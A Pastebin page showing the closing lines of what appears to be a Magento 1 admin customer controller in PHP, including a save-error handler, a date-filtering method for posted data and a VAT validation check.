  985. ->addException($e, $this->__('Cannot save the customer.'));
  986. }
  987. }
  988.  
  989. $this->_redirect('*/*/edit');
  990. }
  991.  
  992. /**
  993. * Filtering posted data. Converting localized data if needed
  994. *
  995. * @param array
  996. * @return array
  997. */
  998. protected function _filterPostData($data)
  999. {
  1000. $data = $this->_filterDates($data, array('dob'));
  1001. return $data;
  1002. }
  1003.  
  1004. /**
  1005. * Check whether VAT ID validation is enabled
  1006. *
  1007. * @param Mage_Core_Model_Store|string|int $store
  1008. * @return bool
  1009. */
  1010. protected function _isVatValidationEnabled($store = null)
  1011. {
  1012. return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
  1013. }
  1014. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!